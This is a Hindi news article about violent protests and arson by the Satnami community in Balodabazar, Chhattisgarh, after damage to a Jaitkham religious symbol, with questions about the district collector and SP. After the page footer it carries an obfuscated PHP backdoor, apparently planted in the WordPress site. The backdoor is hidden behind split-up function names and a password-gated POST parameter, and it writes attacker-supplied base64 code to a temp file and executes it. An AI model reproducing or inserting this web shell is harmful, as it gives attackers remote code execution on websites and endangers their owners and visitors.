क्राइमछत्तीसगढ़

गाड़ियां फूंक दी, कलेक्टर ऑफिस में भी आगजनी : आखिर क्यों सुलग रहा छत्तीसगढ़ का बलौदा बाजार?

बलौदाबाजार। छत्तीसगढ़ के बलौदाबाजार जिले में सतनामी समाज के लोगों ने हिंसक विरोध प्रदर्शन किया है, कई गाड़ियों को आग के हवाले कर दिया गया है। कलेक्टर ऑफिस में भी आगजनी हुई है। बताया जा रहा है कि अमर गुफा में हुई संदिग्ध तोड़फोड के बाद सतनामी समाज की तरफ से यह बवाल किया गया है। पिछले कई दिनों से इस मामले में जांच की मांग हो रही थी। अब उसी बीच भीड़ ने यह हिंसक प्रदर्शन किया। अब प्रशासन की चूक को गंभीरता से लेते हुए कलेक्टर और एसपी को हटाने की बात कही जा रही है।

15 मई की रात सतनामी समाज के सबसे बड़े तीर्थ स्थल कहे जाने वाले गिरौदपुरी धाम के करीब मानाकोनी बस्ती की बाघिन गुफा में लगे धार्मिक प्रतीक चिन्ह जैतखाम को क्षतिग्रस्त किए जाने की घटना इस अंजाम तक पहुंचेगी। इसकी कल्पना भी प्रशासन ने नहीं की थी. जैतखाम को क्षतिग्रस्त किए जाने की घटना के बाद पुलिस ने तीन लोगों को गिरफ्तार कर जेल भेज दिया था। समाज ने कहा कि जेल भेजे गए लोग असली आरोपी नहीं है। समाज ने सीबीआई जांच की मांग को लेकर प्रदर्शन तेज कर दिया था. इतनी बड़ी घटना के बाद अब सरकार इसके पीछे की वजह तलाश रही है, मगर सवाल उठ रहा है कि एक समाजिक आंदोलन आखिर कैसे हिंसक आदोलन में तब्दील हो गया? इस हिंसक आंदोलन को किसने हवा दी?

जैतखाम को क्षतिग्रस्त किए जाने के बाद से अब तक आक्रोशित समाज के भीतर चल रही हलचल को आंकने की चूक आखिर प्रशासन ने कैसे कर दी? हिंसक आंदोलन के बाद अब सवाल कलेक्टर-एसपी की भूमिका पर भी उठाए जा रहे हैं. उच्च पदस्थ सूत्रों की माने तो सरकार कलेक्टर-एसपी को लेकर जल्द ही कोई बड़ा फैसला ले सकती है।

*कलेक्टर-एसपी को अंदेशा तक नहीं*

6 हजार से ज्यादा लोग प्रदर्शन में शामिल थे। जैतखाम क्षतिग्रस्त करने के बाद समाज के आक्रोशित लोगों की इतनी बड़ी भीड़ जुटी, लेकिन स्थानीय प्रशासन ने इसे गंभीरता से नहीं लिया. प्रशासन को लगा कि यह सामान्य प्रदर्शन होगा. प्रदर्शन में ही भीड़ आक्रोशित हो गई और कलेक्टर कार्यालय का घेराव करने निकल पड़ी. जिले के एसपी सदानंद कुमार ने मीडिया से बातचीत में बताया कि समाज के लोगों ने शांतिपूर्वक प्रदर्शन की अनुमति मांगी थी. प्रदर्शन के दौरान ही अचानक हंगामा शुरू हो गया. लोग बेकाबू हो गए। आगजनी और पत्थरबाजी शुरू हो गई। पुलिस की बैरिकेटिंग तोड़कर भीड़ कलेक्टर कार्यालय पहुंच गई और भवन को आग लगा दिया।

Related Articles

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to top button
×

Powered by WhatsApp Chat

×
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}